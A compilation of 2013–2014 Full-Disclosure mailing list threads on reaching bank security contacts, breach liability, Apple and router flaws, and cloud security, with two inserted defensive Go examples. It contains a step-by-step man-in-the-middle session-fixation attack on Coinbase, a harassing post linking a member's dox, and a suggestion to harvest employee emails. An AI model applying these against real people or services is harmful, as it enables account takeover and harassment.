Re: [Full-disclosure] Bank of the West security contact?
On Mon, Mar 17, 2014 at 12:37 PM, Jeffrey Walton noloa...@gmail.com wrote:
> On Mon, Mar 17, 2014 at 12:15 PM, Kristian Erik Hermansen kristian.herman...@gmail.com wrote:
>> Just wanted to post a follow-up to this and provide some context to make it known:
>>
>> * Bank of the West was contacted in 2011 to report a security issue
>> * No response for 2 years
>> * In late 2013, I received a breach notification saying my own sensitive personal information was compromised via the EXACT SAME ISSUES I REPORTED. I also am led to believe employee information was compromised, which may include Social Security Number (SSN) details.
>>
>> Conclusions?
>>
>> * Bank of the West has NO WORKING SECURITY REPORTING MECHANISM for outside researchers and NO BUG BOUNTY PROGRAM
>> * Bank of the West does not seem to take security and privacy seriously enough, as far as I can tell
>>
>> You should know this if you are an existing or potential customer / employee of Bank of the West...
>
> The risk equations favor "do nothing". It's cost-effective to simply pursue profits and not spend money on data security. If (when) they are breached, it only costs them the cost of a notification. In the US, that's the cost of bulk mail [0].
>
> 46 states, DC, and Territories have Data Breach laws, and nearly none (none?) have any useful provisions for damages. [1] You can't recover for your time lost or services like credit monitoring. Every class action gets tossed out [2]. I've never seen one go to court, and I've been watching them for years.

I might just stand corrected here (if it withstands appeal): http://www.slyck.com/story2351_Data_Breach_Settlement_Class_Action_Lawsuit_Wins_Appeal_in_Court:

> With so many recent data breaches and lacking security measures in place, we know that there are likely to be many more lawsuits forthcoming.
>
> However, in what's believed to be a first win for a class action lawsuit as a result of a data breach where none of the plaintiffs suffered identity theft or direct losses, AvMed, a Florida-based health insurer, lost its case in court to the tune of a $3 million settlement agreement. On February 21, 2014, a federal judge in the Southern District of Florida approved an Order granting motion for final approval of a Class Action Settlement Agreement, and filed a motion for attorneys' fees and expenses, as well as for incentive awards.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bank of the West security contact?
On Mon, Mar 17, 2014 at 12:15 PM, Kristian Erik Hermansen kristian.herman...@gmail.com wrote:
> Just wanted to post a follow-up to this and provide some context to make it known:
>
> * Bank of the West was contacted in 2011 to report a security issue
> * No response for 2 years
> * In late 2013, I received a breach notification saying my own sensitive personal information was compromised via the EXACT SAME ISSUES I REPORTED. I also am led to believe employee information was compromised, which may include Social Security Number (SSN) details.
>
> Conclusions?
>
> * Bank of the West has NO WORKING SECURITY REPORTING MECHANISM for outside researchers and NO BUG BOUNTY PROGRAM
> * Bank of the West does not seem to take security and privacy seriously enough, as far as I can tell
>
> You should know this if you are an existing or potential customer / employee of Bank of the West...

The risk equations favor "do nothing". It's cost-effective to simply pursue profits and not spend money on data security. If (when) they are breached, it only costs them the cost of a notification. In the US, that's the cost of bulk mail [0].

46 states, DC, and Territories have Data Breach laws, and nearly none (none?) have any useful provisions for damages. [1] You can't recover for your time lost or services like credit monitoring. Every class action gets tossed out [2]. I've never seen one go to court, and I've been watching them for years.

In the US, the risk equations must be unbalanced (or swayed in favor of the consumer, who is the ultimate victim). That will take a policy change. However, that likely won't happen as long as corporate America and special interests purchase and trade politicians like sports trading cards.

(I've been watching data breaches and responses for years because I got burned somehow and it cost me over 10K to fix in the 1990s. I never got a notification. I found out after I got sued for unpaid bills and the collection agencies contacted me).

Jeff

[0] http://pe.usps.com/businessmail101/rates/welcome.htm
[1] State Security Breach Notification Laws, http://www.ncsl.org/research/telecommunications-and-information-technology/security-breach-notification-laws.aspx
[2] Once Again, Clapper Defeats Data Breach Class Action, http://www.mondaq.com/unitedstates/x/294324/Data+Protection+Privacy/Once+Again+Clapper+Defeats+Data+Breach+Class+Action
Re: [Full-disclosure] Fwd: Re: Bank of the West security contact?
On Sun, Feb 9, 2014 at 5:34 PM, Justin Ferguson j...@ownco.net wrote:
> For the record folks, this is the level that Booz Allen et al and the RCMP are at as a failed entrapment attempt. Surely you can do better than that...
>
> On Feb 9, 2014 11:53 AM, doxingtheidi...@hushmail.com wrote:
>> Justin - I think we're all pretty tired of your lack of maturity. There's a reason why you're no longer at IOActive, and I think it's about time everyone knew the real you. Doing a Google search on you turned up quite a bit of interesting information, including this dox on you by the people you burned a few years back when you were trying to become a member of Anonymous with all your conspiracy theories: http://dumpz.org/218006/text/
>>
>> Oh, and I think we will all get a kick out of your photos: http://s1306.photobucket.com/user/doxingtheidiots/library/
Re: [Full-disclosure] Bank of the West security contact?
RFC 2142 offers a number of well known mailboxes that should be monitored. Try secure@, security@, and support@.

WHOIS offers technical and administrative contacts.

$ whois bankofthewest.com

Whois Server Version 2.0

Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information.

   Domain Name: BANKOFTHEWEST.COM
   Registrar: NETWORK SOLUTIONS, LLC.
   Whois Server: whois.networksolutions.com
   Referral URL: http://www.networksolutions.com/en_US/
   Name Server: A1.VERISIGNDNS.COM
   Name Server: A2.VERISIGNDNS.COM
   Name Server: A3.VERISIGNDNS.COM
   Name Server: DNS1.BANKOFTHEWEST.COM
   Name Server: DNS2.BANKOFTHEWEST.COM
   Name Server: DNS3.BANKOFTHEWEST.COM
   Name Server: DNS4.BANKOFTHEWEST.COM
   Status: clientTransferProhibited
   Updated Date: 13-jul-2013
   Creation Date: 23-jan-1996
   Expiration Date: 24-jan-2020

Last update of whois database: Sat, 08 Feb 2014 09:19:03 UTC

NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration.

TERMS OF USE: You are not authorized to ...

The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars.

Domain Name: BANKOFTHEWEST.COM
Registry Domain ID:
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://www.networksolutions.com/en_US/
Updated Date: 2011-01-04T00:00:00Z
Creation Date: 1996-01-23T00:00:00Z
Registrar Registration Expiration Date: 2020-01-25T00:00:00Z
Registrar: NETWORK SOLUTIONS, LLC.
Registrar IANA ID: 2
Registrar Abuse Contact Email: ab...@web.com
Registrar Abuse Contact Phone: 800-333-7680
Reseller:
Domain Status: clientTransferProhibited
Registry Registrant ID:
Registrant Name: the West, Bank of
Registrant Organization: Bank of the West / William Scanlin
Registrant Street: 2527 Camino Ramon
Registrant City: San Ramon
Registrant State/Province: CA
Registrant Postal Code: 94583
Registrant Country: US
Registrant Phone: (925) 843-2358
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: regist...@bankofthewest.com
Registry Admin ID:
Admin Name: the West, Bank of
Admin Organization: Bank of the West / William Scanlin
Admin Street: 2527 Camino Ramon
Admin City: San Ramon
Admin State/Province: CA
Admin Postal Code: 94583
Admin Country: US
Admin Phone: (925) 843-2358
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: regist...@bankofthewest.com
Registry Tech ID:
Tech Name: the West, Bank of
Tech Organization: Bank of the West / William Scanlin
Tech Street: 2527 Camino Ramon
Tech City: San Ramon
Tech State/Province: CA
Tech Postal Code: 94583
Tech Country: US
Tech Phone: (925) 843-2358
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: regist...@bankofthewest.com
Name Server: DNS1.BANKOFTHEWEST.COM
Name Server: DNS2.BANKOFTHEWEST.COM
Name Server: DNS3.BANKOFTHEWEST.COM
Name Server: DNS4.BANKOFTHEWEST.COM
Name Server: A1.VERISIGNDNS.COM
Name Server: A2.VERISIGNDNS.COM
Name Server: A3.VERISIGNDNS.COM
DNSSEC: not signed
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
Last update of whois database: Sat, 08 Feb 2014 09:19:03 UTC

The data in Networksolutions.com's WHOIS database ...

On Sat, Feb 8, 2014 at 12:27 AM, Kristian Erik Hermansen kristian.herman...@gmail.com wrote:
> Anyone have security contact at Bank of the West?
> --
> Kristian Erik Hermansen
> https://www.linkedin.com/in/kristianhermansen
> https://profiles.google.com/kristian.hermansen
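As an added illustration of the two lookups in the message above (this is not code from the thread), here is a small Go program that parses a registrar-WHOIS record's "Key: Value" lines, pulls out the role contacts ("Registrar Abuse Contact Email", "Admin Email", "Tech Email" and so on), de-duplicates them, and builds the RFC 2142 mailbox list for the domain. The record embedded below is constructed with ".example" names and placeholder addresses, and the function names are the author's own, not anything from the whois tool.

```go
// Added example, not code from the thread: parse a WHOIS record and list the
// mailboxes a reporter would try. Record and names below are constructed.
package main

import (
	"fmt"
	"sort"
	"strings"
)

// kv is one "Key: Value" line. Keys repeat (Name Server) and values can be
// empty (Registry Domain ID), so an ordered slice is used instead of a map.
type kv struct{ key, val string }

// Contact is an e-mail address from the record together with its role.
type Contact struct {
	Role  string // "Registrar Abuse Contact", "Admin", "Tech", ...
	Email string
}

// ParseWhois splits a record into key/value pairs on the first colon of each
// line and drops blank lines and free-text notices.
func ParseWhois(record string) []kv {
	var pairs []kv
	for _, line := range strings.Split(record, "\n") {
		line = strings.TrimSpace(line)
		if line == "" || strings.HasPrefix(line, "NOTICE:") || strings.HasPrefix(line, "TERMS OF USE:") {
			continue
		}
		i := strings.Index(line, ":")
		if i < 0 {
			continue
		}
		pairs = append(pairs, kv{strings.TrimSpace(line[:i]), strings.TrimSpace(line[i+1:])})
	}
	return pairs
}

// Contacts keeps every "... Email" field that actually holds an address.
func Contacts(pairs []kv) []Contact {
	var out []Contact
	for _, p := range pairs {
		if strings.HasSuffix(p.key, "Email") && strings.Contains(p.val, "@") {
			out = append(out, Contact{
				Role:  strings.TrimSpace(strings.TrimSuffix(p.key, "Email")),
				Email: strings.ToLower(p.val),
			})
		}
	}
	return out
}

// UniqueEmails de-duplicates the addresses (registrant, admin and tech are
// often the same mailbox) and sorts them for stable output.
func UniqueEmails(cs []Contact) []string {
	seen := map[string]bool{}
	var out []string
	for _, c := range cs {
		if !seen[c.Email] {
			seen[c.Email] = true
			out = append(out, c.Email)
		}
	}
	sort.Strings(out)
	return out
}

// RFC2142Mailboxes returns the well-known role addresses from RFC 2142 that
// are relevant to a security report, in the order worth trying.
func RFC2142Mailboxes(domain string) []string {
	roles := []string{"security", "abuse", "noc", "hostmaster", "postmaster", "webmaster", "support"}
	out := make([]string, 0, len(roles))
	for _, r := range roles {
		out = append(out, r+"@"+strings.ToLower(domain))
	}
	return out
}

// sampleRecord is a constructed record in the registrar-WHOIS layout; the
// domain and addresses are placeholders, not a real registration.
const sampleRecord = `Domain Name: BANK.EXAMPLE
Registry Domain ID:
Registrar WHOIS Server: whois.registrar.example
Registrar URL: http://www.registrar.example/
Registrar Abuse Contact Email: Abuse@registrar.example
Registrar Abuse Contact Phone: 000-000-0000
Registrant Email: hostmaster@bank.example
Admin Email: hostmaster@bank.example
Tech Email: hostmaster@bank.example
Name Server: DNS1.BANK.EXAMPLE
Name Server: DNS2.BANK.EXAMPLE
DNSSEC: not signed
NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship expires.
Last update of whois database: Sat, 08 Feb 2014 09:19:03 UTC`

func main() {
	cs := Contacts(ParseWhois(sampleRecord))
	for _, c := range cs {
		fmt.Printf("%-24s %s\n", c.Role, c.Email)
	}
	fmt.Println("unique:", UniqueEmails(cs))
	fmt.Println("rfc2142:", RFC2142Mailboxes("bank.example"))
}
```

The registrar abuse mailbox is the one contact a registrar is obliged to publish, so it is kept separate from the registrant's own admin/tech addresses rather than collapsed into a single "contact" field.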
Re: [Full-disclosure] Bank of the West security contact?
On Sat, Feb 8, 2014 at 6:05 AM, Justin Ferguson j...@ownco.net wrote:
> well, not to be outdone by the RFC parroting and amazing whois. If you google @bankofthewest.com or (at)bankofthewest(dot)com you'll pull a bazillion email addresses that you can spam. Alternatively c...@bankofthewest.com c...@bankofthewest.com or kirsten.ga...@bankofthewest.com or duke.da...@bankofthewest.com as firstname.lastn...@bankofthwest.com is the apparent format.
>
> That said, unlike turbo here, I recognize you're looking for confirmed contacts, and I don't have any there. He thought you possibly didn't know how to whois, I suggested to him that he could also look up their CSR number in the phone book, because perhaps you didn't know how to do that either; of course, American banks don't actually get that +1 is a country code.. so, yeah.

You should also provide some of that crack legal advice, too.

Jeff

> On Sat, Feb 8, 2014 at 5:45 AM, Jeffrey Walton noloa...@gmail.com wrote:
>> On Sat, Feb 8, 2014 at 12:27 AM, Kristian Erik Hermansen kristian.herman...@gmail.com wrote:
>>> Anyone have security contact at Bank of the West?
>>
>> You might also try reaching out to Justin Ferguson. The impression I got is he is masterful at infosec; and he can probably put you in touch with someone in about 3 degrees - perhaps even 1 (that beats the snot out of six degrees for other famous people).
Re: [Full-disclosure] Bank of the West security contact?
On Sat, Feb 8, 2014 at 6:05 AM, Justin Ferguson j...@ownco.net wrote:
> well, not to be outdone by the RFC parroting and amazing whois. If you google @bankofthewest.com ...

Google does not allow you to search for the '@' symbol. https://productforums.google.com/forum/#!topic/websearch/Dj-lKNCKK8o. That's why there are email harvesters out there.

Perhaps you were using the amphora symbol, or you meant bankofthewest.com.

Jeff
Re: [Full-disclosure] Bank of the West security contact?
On Sat, Feb 8, 2014 at 7:05 AM, Justin Ferguson j...@ownco.net wrote:
>> Google does not allow you to search for the '@' symbol.
>
> funny, there is a marked difference between when you search for domain.com and @domain.com, one of which is that it includes a lot of email addresses. Google is even so kind as to link in common email address distortions. Try before you speak please, turbo.

Oh, got it. Google's policies and rules don't apply to you. Silly me.

You'll have to forgive me. I'm a slow learner at times.

Jeff
Re: [Full-disclosure] Bank of the West security contact?
On Sat, Feb 8, 2014 at 7:11 AM, Justin Ferguson j...@ownco.net wrote:
> ...
>> You'll have to forgive me. I'm a slow learner at times.
>
> probably because, per you, you don't read webpages due to evil ToS' ..

That's not what I said when you were trolling offline. You could cite it if you'd like.

Jeff
Re: [Full-disclosure] Bank of the West security contact?
On Sat, Feb 8, 2014 at 7:17 AM, Justin Ferguson j...@ownco.net wrote:
>> That's not what I said when you were trolling offline. You could cite it if you'd like.
>
> it's cool, I actually didn't click reply-all for a reason. you elected to go for group consensus, old one.

I thought it was selfish keeping your cornucopia of knowledge to myself. Hence the reason I suggested Kristian engage you.

Jeff

> On Sat, Feb 8, 2014 at 7:14 AM, Jeffrey Walton noloa...@gmail.com wrote:
>> On Sat, Feb 8, 2014 at 7:11 AM, Justin Ferguson j...@ownco.net wrote:
>>> ...
>>>> You'll have to forgive me. I'm a slow learner at times.
>>>
>>> probably because, per you, you don't read webpages due to evil ToS' ..
>>
>> That's not what I said when you were trolling offline. You could cite it if you'd like.
Re: [Full-disclosure] Bank of the West security contact?
On Sat, Feb 8, 2014 at 11:32 AM, Daniel Wood daniel.w...@owasp.org wrote:
> Keep this list professional guys. I hate seeing it turn into an IRC chat room. Justin, you should really stop this type of behavior, you're not doing yourself any favors. I let it go when you decided you wanted to repeatedly bash me privately over one of my CVE's posted here, however I can see it's starting to look like a pattern for you.

http://www.collegehumor.com/video/5817726/internet-bridge-troll

Jeff
Re: [Full-disclosure] EE BrightBox router hacked - bares all if you ask nicely
On Thu, Jan 16, 2014 at 12:44 PM, valdis.kletni...@vt.edu wrote:
> On Thu, 16 Jan 2014 11:30:18 +, Dan Ballance said:
>> So your point is that there should be legislation to require companies to adhere to certain security standards? I'd support that - particularly in an ISP market which is clearly defined by national boundaries and law.
>
> OK.. What standard do you want to hoist as a legal mandate?

No standards are needed. Attach a nominal dollar amount to the data. That will unbalance the risk equations and the industry will act on its own.

For example, if it takes 2 hours to reset all your passwords (password reuse is rampant), then allow a consumer to recover $250 for their time. If PII is lost, allow them damages of 7 years of credit reporting (about $150) plus actual damages from any loss. Hell, I had to overnight a credit card last summer while on business that was cancelled due to a breach. That cost me $75.00. Perhaps triple damages are in order, too.

> Bonus points for finding a standard that provides enough *actual* security that it is worth doing...

+1

> ... but yet won't bankrupt the industry.

Computing is a privilege, not a right. Should Sony continue to be allowed to compute when they suffered at least 50 incidents, including data loss (http://attrition.org/security/rants/sony_aka_sownage.html)? Hell, Sony suffered 7 different incidents in one month (http://www.thetechherald.com/article.php/201121/7185/Seven-security-incidents-in-two-months-Sony-s-nightmare-grows). How much time and aggravation have they caused to institutions and consumers? That's driving drunk on the information superhighway.

Jeff
Re: [Full-disclosure] EE BrightBox router hacked - bares all if you ask nicely
On Wed, Jan 15, 2014 at 3:28 PM, Scott Helme scotthe...@hotmail.com wrote:
> The BrightBox router is the standard equipment issued by UK ISP Everything Everywhere (EE) to its subscribers. The device not only leaks sensitive data but is remotely exploitable too. An attacker even has the ability to take control of your account as the router leaks your ISP account credentials.
>
> You can read the full article here: https://scotthelme.co.uk/ee-brightbox-router-hacked/

To add insult to injury, they are probably using a hard-coded public key pair, and it's probably in the littleblackbox (http://code.google.com/p/littleblackbox/).
Re: [Full-disclosure] Where are you guys standing re: the (full) disclosure
On Fri, Dec 13, 2013 at 12:28 PM, Gary Baribault g...@baribault.net wrote:
> Rather harsh don't you think? I'm all for OSS but I have expenses and need to make money. Yes M$ makes money, but I think they're ethical just as much as any other company .. is IBM ethical? Is HP ethical? Is Dell (the company) ethical? They all are to some degree.

Try Apple. They withhold security updates until the press release for their latest iOS version. See, for example, the hundreds of fixes in https://lists.apple.com/archives/security-announce/2012/Sep/msg3.html. At least Microsoft patches on a regular basis.

Jeff
Re: [Full-disclosure] Seems like Coinbase Security Team doesn't know how their cookie works
> While I don't see the point of saving the csrf token in a cookie I must say that in every fucking programming book there is written that tokens should be regenerated after logins. Or maybe I am just crazy or there are some other factors I did not consider?

Cookies don't completely remediate Injections and CSRF (as you can see). You really only have two defenses: fix the injection or re-authenticate the user during high value transactions. For the latter, challenge them with their password to ensure they initiated the transaction.

Jeff

On Fri, Nov 29, 2013 at 11:24 AM, giu...@anche.no wrote:
> During last summer I wrote them a report with the following content. I was not expecting a reward because my poc could work only in Man In The Middle scenarios and only under certain circumstances, but at least I was expecting a good reply and a fix.
>
> Here is what I wrote them:
>
> Hi, I do not know if this type of vulnerability may qualify for your bug bounty but it's in some way exploitable and it was funny to think on. Firstly please excuse me if I'm not so clear as you may hope because English is not my native language.
>
> This proof of concept works in a scenario where a malicious attacker can perform a man in the middle attack on the victim (like a public hotspot, a university network etc.). Here is an example of attack:
>
> 1) Attacker visits coinbase.com and grabs a normal session cookie (_coinbase_session), which is base64 encoded and contains both a 'session_id' and a '_csrf_token' value.
> 2) Attacker starts a webserver on localhost which sets the cookie grabbed before for the coinbase.com domain.
> 3) Attacker starts DNS poisoning through ARP spoofing on the victim, pointing coinbase.com to his own box.
> 4) Attacker starts a code injection through ARP spoofing and injects a hidden iframe that points to coinbase.com, which now resolves to his box.
> 5) The victim visits any random non-SSL website and the _coinbase_session is set by the attacker.
> 6) As soon as the victim visits a non-SSL website at least one time, the attacker stops DNS spoofing and points coinbase.com to its original server.
> 7) The victim logs in (or logs in again if he was previously logged in).
> 8) The attacker can now inject perfectly crafted POST or GET requests using the csrf_token he previously set for the victim.
> 9) As soon as the victim visits a random non-SSL website and is still logged in, the attacker can perform the actions he wants on his account.
>
> The advantage is a sort of 'SSL bypass' since the user in theory has no way to defend or notice this attack. I know and understand that it is really tricky to do but I worked on this and at least I wanted to share it :)
>
> A simple fix would just be to regenerate the csrf_token once the user logs in but I'm sure you'll find a better way.
>
> The only thing that I didn't mention here is that they have an HSTS policy so this may have worked only with users who haven't visited coinbase with the browser they're using before.
>
> I got this response:
>
> Thank you for the disclosure, we appreciate it. I have only looked at it briefly by now but doesn't the secure flag on the session cookie prevent from leaking the csrf token or any injection at all. kind regards, [removed]
>
> and replied with:
>
> Hi, I think that's not true. Actually the point is that we are impersonating the domain in order to set an already known _coinbase_session. It is possible to set a cookie with the 'secure' flag through HTTP while, as you said, it is obviously not possible to read it, but since we're defining it we already know it. I hope now it is more clear. Thank you.
>
> They replied:
>
> interesting. and how would you get around the browsers cert warning if you mitm arp/dns spoof the domain?
>
> Replies:
>
> Writing a script that detects when the user starts browsing a non-SSL website and when it returns true it starts dns spoofing and injecting the iframe which loads http://coinbase.com, which sets the cookie. As soon as the user loads the iframe at least one time the dns poisoning stops and the user shouldn't notice anything. I'm actually writing a tool to automate this process because most sites seem vulnerable. So yes, if the victim browses only coinbase.com and does nothing else before login or before signing out this doesn't work but I think in most cases this won't happen.
>
> Their reply:
>
> so what you are really saying is that the csrf token is shared among secure and non secure cookie our app sets. because if the user browser coinbase.com(http) it would not net the same cookie with the secure flag like it does when you get redirected to https
>
> Actually I did not completely understand that statement, probably because of my English, anyway I replied with:
>
> Normally a session fixation consists in setting a known session cookie for the victim, so instead of trying to grab a valid session we simply force the user to validate the one we provided. This can be achieved performing the dns
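The fix the reporter asks for, and the one Jeff's reply takes for granted, is to regenerate the CSRF token (and the session id) at login. As an added illustration that is not Coinbase's code or anything from the thread, the Go program below models a session store with and without that rotation and replays the report's scenario as a unit check: an anonymous session is obtained, its id and token are remembered (the values an attacker would plant in a victim's browser), the victim logs in, and the remembered token is then tried. The store, the function names and the in-memory map are assumptions made for the example.

```go
// Added example, not Coinbase's code: a session store that issues a fresh
// session id and CSRF token at login, so a token an attacker planted before
// login is worthless afterwards. Names and the in-memory store are mine.
package main

import (
	"crypto/rand"
	"crypto/subtle"
	"encoding/hex"
	"errors"
	"fmt"
)

// Session is the server-side state behind one session cookie. A cookie-store
// design carries the same fields inside the cookie; the rotation is the same.
type Session struct {
	ID        string
	CSRFToken string
	UserID    string // empty while anonymous
}

// Store is an in-memory stand-in for a real session backend.
type Store struct{ sessions map[string]*Session }

func NewStore() *Store { return &Store{sessions: map[string]*Session{}} }

// randomToken returns 256 bits from the CSPRNG, hex encoded.
func randomToken() string {
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		panic(err) // a failing CSPRNG must not be papered over
	}
	return hex.EncodeToString(b)
}

// Anonymous creates the pre-login session a first visit receives.
func (s *Store) Anonymous() *Session {
	sess := &Session{ID: randomToken(), CSRFToken: randomToken()}
	s.sessions[sess.ID] = sess
	return sess
}

// Login authenticates the session. With rotate=true the old id and token are
// discarded and new ones issued (the fix the report asks for); with
// rotate=false the pre-login values are kept, which is the weak behaviour.
func (s *Store) Login(sess *Session, userID string, rotate bool) *Session {
	if !rotate {
		sess.UserID = userID
		return sess
	}
	delete(s.sessions, sess.ID)
	fresh := &Session{ID: randomToken(), CSRFToken: randomToken(), UserID: userID}
	s.sessions[fresh.ID] = fresh
	return fresh
}

var ErrCSRF = errors.New("unknown session or csrf token mismatch")

// CheckCSRF guards a state-changing request: the session must exist and the
// submitted token must match, compared in constant time.
func (s *Store) CheckCSRF(sessionID, submitted string) error {
	sess, ok := s.sessions[sessionID]
	if !ok || subtle.ConstantTimeCompare([]byte(sess.CSRFToken), []byte(submitted)) != 1 {
		return ErrCSRF
	}
	return nil
}

// PlantedTokenRejected replays the report's scenario: an anonymous session's
// id and token are remembered, the victim logs in, and the remembered token
// is tried. It returns true when that token no longer authorises a request
// while the victim's own current token still does.
func PlantedTokenRejected(s *Store, rotate bool) bool {
	planted := s.Anonymous()
	knownID, knownToken := planted.ID, planted.CSRFToken
	victim := s.Login(planted, "victim", rotate)
	staleRejected := s.CheckCSRF(knownID, knownToken) != nil
	currentAccepted := s.CheckCSRF(victim.ID, victim.CSRFToken) == nil
	return staleRejected && currentAccepted
}

func main() {
	fmt.Println("with rotation, planted token rejected:   ", PlantedTokenRejected(NewStore(), true))
	fmt.Println("without rotation, planted token rejected:", PlantedTokenRejected(NewStore(), false))
}
```

The secure flag only stops the token from being read over plain HTTP; it does not stop a plain-HTTP response from overwriting a cookie of the same name, which is the reporter's point. Rotating at login removes the value of a planted token however it got there, and it is the same rotation that defeats classic session fixation.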
Re: [Full-disclosure] iCloud and privacy...last word
And don't forget Apple's own lawyers tell us it can't be trusted:

A layman's analysis of License Agreements and Terms and Conditions reveals how little security is afforded to your documents in cloud storage and backup to the cloud. For those who don't read them, one popular platform has 142 separate documents covering Terms of Conditions for its cloud alone.[1] The documents discuss your rights if the company (1) gives away your data, (2) shares your data with partners, (3) loses your data, (4) provides your data to authorities (sometimes without an order or warrant), (5) does not provide reasonable skill or care, (6) commits willful misconduct or fraud, and (7) acts with negligence or gross negligence. "Your rights" is misleading since it is consent, and the document effectively states you indemnify the company: "You agree to defend, indemnify and hold Apple, its affiliates, subsidiaries, directors, officers, employees, agents, partners, contractors, and licensors harmless from any claim or demand, including reasonable attorneys' fees, made by a third party."[2]

[1] iCloud Terms and Conditions, https://www.apple.com/legal/internet-services/icloud/ww/
[2] iCLOUD TERMS AND CONDITIONS, https://www.apple.com/legal/internet-services/icloud/en/terms.html

On Thu, Nov 28, 2013 at 8:21 AM, silence_is_b...@hushmail.com wrote:
> Apple Discussions has a large portion of people dead set on making sure everyone knows that iCloud data is different than your other data. I disagree...follow your data: http://www.apple.com/privacy
>
> Here are some examples of the types of personal information Apple may collect and how we may use it.
>
> What: we may collect a variety of information, including your name, mailing address, phone number, email address, contact preferences, and credit card information. When you share your content with family and friends using Apple products, send gift certificates and products, or invite others to join you on Apple forums, Apple may collect the information you provide about those people such as name, mailing address, email address, and phone number.
>
> So my info and any info about friends...gotcha.
>
> How they use/share: It also helps us to improve our services, content, and advertising. You may be asked to provide your personal information anytime you are in contact with Apple or an Apple affiliated company. Apple and its affiliates may share this personal information with each other and use it consistent with this Privacy Policy. They may also combine it with other information to provide and improve our products, services, content, and advertising.
>
> iCloud: http://support.apple.com/kb/HT4865
>
> the Pièce de résistance: This article explains how iCloud keeps your personal information and data secure. In addition to this article, you should also review Apple's Privacy Policy, which covers iCloud.
>
> Yea, last word on this...use iCloud, share your stuff with Apple and their affiliates...and done!
Re: [Full-disclosure] Another Apple Security Failure (Apple Mail on the iPhone)....
On Fri, Nov 15, 2013 at 12:23 AM, Caspian Kilkelly casp...@random-interrupt.org wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> What version of IOS was this? I'm looking into something similar on other apple platforms, but it doesn't seem consistently repeatable.

iOS 7.0.3 (11B511) on an iPhone 4 (MD146LL/A).

Jeff

> On 13-11-11 6:41 PM, Jeffrey Walton wrote:
>> My iPhone does not store sensitive information. It's a phone and music player only. (I'm not sure it could save sensitive information if I needed it, as the following demonstrates).
>>
>> About 6 weeks ago, a colleague was having trouble adding an email account to his iPhone and sending email. I allowed him to add his account to my iPhone for testing. After testing, we deleted the account.
>>
>> My colleague was having trouble with Apple iPhone mail again this week. This time, I added my account to the phone. I used my account because he's remote and I don't want his password. Note: we use the same incoming and outgoing email servers.
>>
>> After running the setup wizard, my outgoing server was populated with his email credentials - both username and password.
>>
>> So much for deleting that username and password about 6 weeks ago.
[Full-disclosure] Another Apple Security Failure (Apple Mail on the iPhone)....
My iPhone does not store sensitive information. It's a phone and music player only. (I'm not sure it could save sensitive information if I needed it, as the following demonstrates).

About 6 weeks ago, a colleague was having trouble adding an email account to his iPhone and sending email. I allowed him to add his account to my iPhone for testing. After testing, we deleted the account.

My colleague was having trouble with Apple iPhone mail again this week. This time, I added my account to the phone. I used my account because he's remote and I don't want his password. Note: we use the same incoming and outgoing email servers.

After running the setup wizard, my outgoing server was populated with his email credentials - both username and password.

So much for deleting that username and password about 6 weeks ago.
Re: [Full-disclosure] Cloud Questions
On Fri, Nov 8, 2013 at 9:08 AM, David Miller dmil...@metheus.org wrote:
> ...
> I don’t think I’ve seen a single post about cloud security. Is ‘the cloud’, AWS in particular, believed to be secure? Is it simply not targeted?

Stallman has a term for it: Careless Computing. http://techcrunch.com/2010/12/14/stallman-cloud-computing-careless-computing/.

> Or would it be covered by some other list? Inquiring minds are, uh, inquiring.

The only list I've seen so far is OpenStack's security list. http://lists.openstack.org/cgi-bin/mailman/listinfo/openstack-security.

From what I've seen, cloud security seems to have three broad tracks (in addition to all the secure coding and HTML app stuff). First is low-level security that acts on block devices, like Amazon's CloudHSM and others who focus on VM security. Second is high level security that attempts to secure databases (table fields) and object stores (Amazon S3 and OpenStack Swift), like CipherCloud and Armor-Cloud. And third is identity management, like the federated and single sign-on integrations.

Jeff
Re: [Full-disclosure] Cloud Questions
The first problem is TCO. Cloud services are easy to set up (both as a vendor and as a user), and have little to no hard start-up costs. (costs that initially are billed as startup costs, before the service payments start). Also see http://www.gossamer-threads.com/lists/openstack/dev/32772, where some are considering charging you for the I/O to securely delete a VM! Jeff On Sat, Nov 9, 2013 at 9:50 AM, Yvan Janssens i...@yvanj.me wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Hello, I will split my answer in two parts, as they represent both views I regularly experience. They aren't all related to security. The first problem is TCO. Cloud services are easy to set up (both as a vendor and as a user), and have little to no hard start-up costs. (costs that initially are billed as startup costs, before the service payments start). This results in decisions which aren't really thinked throughly about in a lot of cases, resulting in poor setups both by the vendor and by the end-user/customer. Being able to ship fast also means that you can make mistakes fast - several providers have been caught in the past while I was using them on blatant mistakes. Another problem is that you trust a service to a third party provider, which has full access to the data. I know, there are ways to prevent this/make this difficult, but in the end it will not be feasible on the long term to employ such techniques. Targeted attacks will always succeed, but are easier on cloud services to my opinion. Support services are useful sources for social engineering (check some of the last cases of DNS hijacking), since they are used to handle requests for all customers, and not only internal employees. The other problem is that you share a physical computer with someone you don't know and cannot trust. Information leakage techniques have been discovered [1] and it wouldn't be the first time that someone finds a clever way to break out of the VM. 
[2] It is also more feasible to DoS your application if the physical hardware is shared with others who aren't trustworthy. Most providers monitor extensive resource usage, but try a cheap one, put a VM on full RAM capacity, disk I/O requests and CPU usage and see how long it takes to get a notice asking you to inspect the machine.

There is also a huge thing to tell about stuff which used to be conspiracy theories about surveillance, but this is out of scope for this response to avoid indulging trolling.

